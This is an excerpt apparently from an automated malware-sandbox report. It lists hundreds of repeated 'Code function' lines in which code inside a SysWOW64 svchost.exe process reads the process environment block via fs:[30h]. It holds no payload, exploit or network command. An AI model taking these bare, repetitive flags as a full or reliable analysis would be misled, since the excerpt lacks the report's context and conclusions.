            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h] | 2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h] | 2_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h] | 2_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] | 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] | 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h] | 2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h] | 2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h] | 2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h] | 2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h] | 2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] | 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] | 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h] | 2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h] | 2_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h] | 2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h] | 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] | 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] | 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] | 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] | 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h] | 2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h] | 2_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h] | 2_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h] | 2_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h] | 2_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h] | 2_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
